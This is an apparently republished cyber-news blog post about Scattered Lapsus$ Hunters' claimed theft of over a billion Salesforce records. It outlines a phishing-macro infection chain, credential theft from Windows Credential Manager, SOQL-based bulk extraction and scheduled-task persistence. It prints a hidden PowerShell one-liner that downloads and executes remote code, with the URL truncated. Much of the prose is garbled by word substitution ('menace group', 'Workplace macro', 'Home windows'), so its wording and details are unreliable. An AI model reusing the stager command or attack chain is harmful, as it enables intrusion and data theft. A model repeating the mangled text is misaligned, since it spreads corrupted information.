Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

Scattered Lapsus$ Hunters Claim to Have Stolen More Than 1 Billion Salesforce Records

Posted on October 13, 2025October 13, 2025 By CWS

Scattered Lapsus$ Hunters, a menace group beforehand related to high-profile information thefts, not too long ago claimed accountability for exfiltrating over one billion information from Salesforce environments worldwide.

Rising in mid-2025, the group has honed its techniques to use misconfigurations in cloud identities and uncovered APIs.

Preliminary stories surfaced when a number of Salesforce clients noticed anomalous queries in opposition to their buyer relationship administration (CRM) cases late at night time, suggesting the presence of an automatic extraction software.

As forensic logs amassed, investigators realized that the quantity and scope of knowledge accessed far exceeded earlier intrusions.

On this newest marketing campaign, attackers leveraged a mixture of focused phishing lures and credential stuffing to realize preliminary footholds.

Bling Libra’s Salesforce information leak web site (Supply – Palo Alto Networks)

Victims reported receiving authentic-looking emails prompting obligatory safety updates, which delivered a malicious Workplace macro.

As soon as executed, the macro reached out to a distant command-and-control server to put in a light-weight loader.

Palo Alto Networks analysts famous that this loader was written in Go and compiled with stripped symbols, making reverse engineering tougher.

The loader subsequently validated API tokens and initiated a multi-stage information harvesting routine.

The impression of this breach extends past uncovered private information; proprietary gross sales methods, pipeline forecasts, and delicate consumer negotiations have all come below menace.

Many organizations rely closely on Salesforce for mission-critical operations, that means any compromise can result in operational disruptions and reputational hurt.

Early estimates counsel that the group might have extracted information at a sustained fee of over 500 gigabytes per hour, exfiltrating information in batches by way of encrypted channels to keep away from detection.

An infection Mechanism

A more in-depth have a look at the an infection mechanism reveals a strategic emphasis on stealth and persistence.

After the preliminary macro dropper executes, a PowerShell script stager is launched by means of a one-liner corresponding to:-

powershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command “& {IEX ((New-Object Web.WebClient).DownloadString(‘

This stager checks for sandbox indicators earlier than retrieving the complete Go-based loader. The loader then decrypts credentials saved within the Home windows Credential Supervisor utilizing the CredRead API and authenticates to the Salesforce REST API with the lowest-privilege service account that meets the info entry necessities.

As soon as authenticated, the malware enumerates object schemas and dynamically constructs SOQL queries to retrieve and batch information. Every batch is buffered in reminiscence and encrypted with ChaCha20 earlier than being transmitted over HTTPS to a devoted exfiltration endpoint.

To make sure persistence, the malware registers a scheduled process named UpdaterSvc that triggers each two hours. This process validates the presence of the loader binary, re-downloads it if altered, and resumes extraction from the final profitable document ID.

The group’s meticulous method to API rate-limit evasion and credential harvesting underscores a complicated understanding of cloud-native environments.

By combining subtle social engineering, customized tooling, and resilient persistence techniques, Scattered Lapsus$ Hunters have demonstrated a formidable functionality to compromise enterprise Salesforce cases at scale.

Observe us on Google Information, LinkedIn, and X to Get Extra Prompt Updates, Set CSN as a Most popular Supply in Google.

Cyber Security News Tags:Billion, Claim, Hunters, LAPSUS, Records, Salesforce, Scattered, Stolen

Post navigation

Previous Post: Malicious Code on Unity Website Skims Information From Hundreds of Customers
Next Post: Linux Kernel 6.18-rc1 Released With Extensive Updates Following a Steady Merge Window

Related Posts

Chrome 0-Day, VMware Flaws Patched, Fortiweb Hack, Teams Abuse, and More Cyber Security News
Acer Control Center Vulnerability Let Attackers Execute Malicious Code as a Privileged User Cyber Security News
Smart Bus Systems Vulnerability Let Hackers Remotely Track and Control Vehicles Cyber Security News
New ‘Win-DoS’ Zero-Click Vulnerabilities Turns Windows Domain Controllers into DDOS Botnet Cyber Security News
Aembit Named to Rising in Cyber 2025 List of Top Cybersecurity Startups Cyber Security News
BlackSuit Ransomware Servers Attacking U.S. Critical Infrastructure Seized by Law Enforcement Seizes Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Hackers Can Bypass OpenAI Guardrails Framework Using a Simple Prompt Injection Technique
  • Axis Communications Vulnerability Exposes Azure Storage Account Credentials
  • JPMorgan to Invest up to $10 Billion in US Companies with Crucial Ties to National Security
  • Hackers Leveraging Microsoft Edge Internet Explorer Mode to Gain Access to Users’ Devices
  • North Korean Hackers Attacking Developers with 338 Malicious npm Packages

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Hackers Can Bypass OpenAI Guardrails Framework Using a Simple Prompt Injection Technique
  • Axis Communications Vulnerability Exposes Azure Storage Account Credentials
  • JPMorgan to Invest up to $10 Billion in US Companies with Crucial Ties to National Security
  • Hackers Leveraging Microsoft Edge Internet Explorer Mode to Gain Access to Users’ Devices
  • North Korean Hackers Attacking Developers with 338 Malicious npm Packages

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News